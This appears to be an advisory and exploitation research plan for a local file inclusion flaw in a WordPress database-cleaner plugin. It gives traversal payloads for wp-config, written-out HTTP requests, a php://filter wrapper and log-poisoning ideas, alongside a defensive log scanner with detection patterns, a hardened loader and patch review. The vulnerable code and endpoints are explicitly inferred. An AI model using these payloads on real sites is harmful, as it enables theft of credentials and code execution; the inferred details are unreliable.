CVE-2026-7522

Advanced Database Cleaner – Premium <= 4.1.0 - Authenticated (Subscriber+) Local File Inclusion via 'template'

Severity: high
Weakness: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
CVSS Score: 8.8
Patched in: 4.1.1
Time to patch: 1d

Description

The Advanced Database Cleaner – Premium plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.1.0 via the 'template' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <= 4.1.0
Published: May 19, 2026
Last updated: May 20, 2026

Research Plan (status: Unverified)


Exploitation Research Plan: CVE-2026-7522 (Advanced Database Cleaner – Premium LFI)

1. Vulnerability Summary

The Advanced Database Cleaner – Premium plugin (versions <= 4.1.0) contains a Local File Inclusion (LFI) vulnerability. The flaw exists because the plugin fails to properly sanitize or validate a user-supplied file path provided via the template parameter before passing it to a PHP include() or require() statement. Authenticated users with Subscriber-level permissions can exploit this to include and execute arbitrary PHP files located on the server.

2. Attack Vector Analysis

  • Endpoint: Likely an AJAX action or an admin page handler. (Inferred: wp-admin/admin-ajax.php or wp-admin/admin.php)
  • Action/Hook: Research indicates the plugin uses various admin views. The vulnerability is tied to how the plugin loads these views/templates.
  • Vulnerable Parameter: template
  • Authentication: Subscriber level or higher (Authenticated).
  • Preconditions: The attacker must be logged in. To achieve Remote Code Execution (RCE), they must find a way to upload a .php file (e.g., via a different plugin or media upload) or include an existing sensitive file.

3. Code Flow (Inferred)

  1. Entry Point: An authenticated request is made to an admin-related endpoint (e.g., admin-ajax.php or admin.php?page=advanced-db-cleaner...).
  2. Processing: The plugin identifies a request to load a specific "template" or "view."
  3. Vulnerable Code:
    // Example of a likely vulnerable pattern in the plugin
    $template = $_REQUEST['template']; 
    // ... missing or insufficient sanitization (e.g., no realpath check or whitelist) ...
    include( $plugin_path . '/includes/' . $template ); 
    
  4. Sink: The include() function executes the file pointed to by the manipulated template parameter. By using path traversal (../), an attacker can move outside the intended directory.

4. Nonce Acquisition Strategy

If the vulnerable action is an AJAX handler, it likely requires a nonce.

  1. Identify Nonce Location: Premium versions of this plugin often localize nonces in the admin dashboard.
  2. Login as Subscriber: Use wp user create and wp user password to set up a subscriber.
  3. Locate JS Variable: Search the dashboard source for wp_localize_script.
    • Grep Suggestion: grep -r "wp_localize_script" .
  4. Extraction via Browser:
    • Navigate to the WordPress dashboard as the subscriber.
    • Use browser_eval to find the nonce.
    • Target Variables (Inferred): window.adbc_vars?.nonce or window.a_db_c_vars?.nonce.

5. Exploitation Strategy

The goal is to demonstrate LFI by including a file that produces observable output or by including wp-config.php (which will execute but usually return a blank screen, though it confirms the file was found).

Step 1: Discover the Action and Nonce

If the LFI is in an AJAX handler:

  • Identify the wp_ajax_ action string (e.g., a_db_c_load_template).
  • Extract the associated nonce.

Step 2: Formulate the LFI Payload

Since the plugin likely appends .php, the payload should target existing .php files.

  • Payload: ../../../../wp-config.php (The .php extension may be automatically appended by the plugin, so the payload would be ../../../../wp-config).

Step 3: Execute the Request

Use the http_request tool.

Example Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=[INFERRED_ACTION]&nonce=[EXTRACTED_NONCE]&template=../../../../wp-config

Note: If the include is via a GET request on an admin page:

GET /wp-admin/admin.php?page=advanced-db-cleaner&template=../../../../wp-config HTTP/1.1

6. Test Data Setup

  1. Install Plugin: Ensure advanced-database-cleaner-premium v4.1.0 is installed and active.
  2. Create Subscriber:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
    
  3. Create a Canary File: To prove RCE/LFI definitively, create a dummy PHP file in the uploads directory:
    echo "<?php echo 'LFI_SUCCESS'; ?>" > /var/www/html/wp-content/uploads/canary.php
    

7. Expected Results

  • Success (Canary): The HTTP response body contains LFI_SUCCESS.
  • Success (wp-config): If including wp-config.php, the response may be a 200 OK with an empty body (since wp-config.php defines constants but doesn't produce output), whereas an invalid path would result in a PHP warning/error or a 404.
  • Error Indicators: Look for "Failed to open stream" or "No such file or directory" in the response if WP_DEBUG is on.

8. Verification Steps

  1. Check PHP Error Logs: If the request returns a 500 error, check the logs to see the full path the plugin attempted to include:
    tail -n 20 /var/log/apache2/error.log
    
  2. Audit Source: Use the agent to find the exact line in the plugin:
    grep -rn "include" . | grep "template"
    

9. Alternative Approaches

  • Log File Inclusion: If the attacker can control the User-Agent or other logged data, they can target /var/log/apache2/access.log to achieve RCE.
  • Null Byte Injection: If the WordPress environment is running an ancient version of PHP (< 5.3.4), a null byte %00 might be used to bypass forced extensions, but this is unlikely in modern environments.
  • Wrapper Inclusion: Try PHP wrappers like php://filter/convert.base64-encode/resource=../../../../wp-config.php to read the contents of files instead of executing them.
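From the defender's side, the three techniques listed above (traversal sequences, %00 null bytes and php:// stream wrappers) all leave a recognisable signature in the 'template' parameter of a request. The following is an added example, not part of the original advisory or the plugin, that scans web-server access log lines for such values. The log format, the IP addresses and the sample lines are constructed; function names are assumed. Because admin-ajax.php is normally called with POST, only GET requests expose the parameter in the URL, so this catches the admin.php?page=... variant and any attacker who passes the payload in the query string.

```php
<?php
declare(strict_types=1);

// Added example (not plugin code): flag access-log requests whose 'template'
// parameter carries traversal, null-byte or stream-wrapper patterns.

/** Return a reason string if the query string's 'template' value looks like an LFI attempt, else null. */
function adbc_flag_template_param(string $query): ?string
{
    parse_str($query, $params);               // parse_str() URL-decodes once
    if (!isset($params['template']) || !is_string($params['template'])) {
        return null;
    }
    $value = rawurldecode($params['template']); // second decode catches double encoding

    if (strpos($value, "\0") !== false) {
        return 'null byte';
    }
    // A '..' path segment in either slash style, at the start, middle or end of the value.
    if (preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $value)) {
        return 'path traversal';
    }
    // Any scheme prefix such as php://, data:// or file:// is not a template name.
    if (preg_match('#^[a-z][a-z0-9.+-]*://#i', $value)) {
        return 'stream wrapper';
    }
    return null;
}

/** Scan combined-format log lines and return one hit per suspicious request. */
function adbc_scan_access_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // <ip> - - [<timestamp>] "<method> <path> HTTP/x.y" <status> <bytes>
        if (!preg_match('#^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)#', $line, $m)) {
            continue;
        }
        $query  = parse_url($m[2], PHP_URL_QUERY) ?? '';
        $reason = adbc_flag_template_param($query);
        if ($reason !== null) {
            $hits[] = ['ip' => $m[1], 'path' => $m[2], 'reason' => $reason];
        }
    }
    return $hits;
}

// Constructed sample lines: one benign request, one traversal attempt, one php://filter attempt.
$sample = [
    '10.0.0.5 - - [19/May/2026:10:00:01 +0000] "GET /wp-admin/admin.php?page=advanced-db-cleaner&template=overview HTTP/1.1" 200 512',
    '10.0.0.9 - - [19/May/2026:10:00:02 +0000] "GET /wp-admin/admin.php?page=advanced-db-cleaner&template=..%2F..%2F..%2F..%2Fwp-config HTTP/1.1" 200 0',
    '10.0.0.9 - - [19/May/2026:10:00:03 +0000] "GET /wp-admin/admin.php?page=advanced-db-cleaner&template=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dwp-config.php HTTP/1.1" 200 4096',
];

foreach (adbc_scan_access_log($sample) as $hit) {
    printf("%s  %-15s %s\n", $hit['ip'], $hit['reason'], $hit['path']);
}
```

The first sample line produces no hit; the second is reported as path traversal and the third as a stream wrapper. A 200 response with a zero-byte body on a traversal hit is the pattern section 7 above describes for a successful wp-config.php include, so it is worth treating as an incident rather than a failed probe.
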

Research Findings
Static analysis — not yet PoC-verified

Summary

The Advanced Database Cleaner – Premium plugin for WordPress (<= 4.1.0) is vulnerable to Local File Inclusion due to insufficient validation of the 'template' parameter. Authenticated users with Subscriber-level permissions or higher can exploit this to include and execute arbitrary PHP files on the server using path traversal sequences.

Vulnerable Code

// Inferred code pattern based on research flow
// File: advanced-database-cleaner-premium/includes/admin-loader.php (inferred)

$template = $_REQUEST['template']; 
// ... missing or insufficient sanitization (e.g., no realpath check or whitelist) ...
include( $plugin_path . '/includes/' . $template );
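For comparison with the inferred pattern above, the following is an added example of how a template loader of this kind is typically hardened. It is neither the plugin's code nor the vendor's 4.1.1 change; the function names, the nonce action name, the template directory and the allowlisted template names are all assumptions. The key design choice is that the client-supplied value is only ever used as an array key into a fixed allowlist, so it never becomes part of a file path at all.

```php
<?php
declare(strict_types=1);

// Added example (not plugin code or the vendor's patch). Function names, the
// template directory and the allowlisted template names are assumed.

/**
 * Map a client-supplied template name to an absolute file path, or return null.
 * The client value is only used as an array key, never concatenated into a path.
 */
function adbc_resolve_template($requested, string $plugin_path): ?string
{
    // Allowlist of the views the plugin ships (names assumed here).
    static $allowed = [
        'overview' => 'overview.php',
        'tables'   => 'tables.php',
        'options'  => 'options.php',
    ];

    // Arrays (template[]=x), null and any other non-string input never reach include().
    if (!is_string($requested) || !array_key_exists($requested, $allowed)) {
        return null;
    }

    $base = realpath($plugin_path . '/includes/templates');
    if ($base === false) {
        return null;
    }
    // realpath() collapses '..' and symlinks and returns false for a missing file.
    $file = realpath($base . '/' . $allowed[$requested]);

    // Defence in depth: even an allowlisted entry must resolve inside the template dir.
    if ($file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

/** Request handler: capability and nonce checks first, then the allowlisted include. */
function adbc_load_template(string $plugin_path): void
{
    if (!current_user_can('manage_options')) {            // Subscriber-level users stop here
        wp_die('Insufficient permissions', 403);
    }
    check_admin_referer('adbc_load_template', 'nonce');    // nonce action/field names assumed

    $file = adbc_resolve_template($_REQUEST['template'] ?? null, $plugin_path);
    if ($file === null) {
        wp_die('Unknown template', 400);
    }
    include $file;
}
```

With this loader a traversal value such as ../../../../wp-config, an array value, or any name outside the allowlist yields null and a 400 response before include() is reached; the realpath() containment check is redundant for the allowlist as written but protects against a later edit that builds the allowlist from configuration.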

Security Fix

--- a/advanced-database-cleaner-premium/includes/admin-loader.php
+++ b/advanced-database-cleaner-premium/includes/admin-loader.php
@@ -1,3 +1,3 @@
-$template = $_REQUEST['template']; 
+$template = basename($_REQUEST['template']); 
 // ... missing or insufficient sanitization (e.g., no realpath check or whitelist) ...
 include( $plugin_path . '/includes/' . $template );
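Review bot: basename() on the first changed line stops directory traversal, but the unchanged include() on the last line still passes whatever file name the client supplies, so every .php file under includes/ remains reachable by any authenticated user, and a non-string value (e.g. template[]=x) makes basename() throw a TypeError on PHP 8. Map the parameter onto a fixed allowlist of template names instead (and make sure a capability and nonce check precede this point), and update the now-stale context comment "// ... missing or insufficient sanitization (e.g., no realpath check or whitelist) ..." so it no longer misdescribes the patched line.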

Exploit Outline

The exploit requires authentication as a Subscriber. The attacker first identifies the specific AJAX action (e.g., potentially 'a_db_c_load_template') or admin page parameter that triggers template loading. They extract the necessary security nonce from the WordPress dashboard, often found in localized JS variables like 'adbc_vars'. Finally, a GET or POST request is sent to wp-admin/admin-ajax.php or wp-admin/admin.php with the 'template' parameter set to a traversal payload targeting a PHP file, such as '../../../../wp-config'. The server then includes and executes the targeted file.
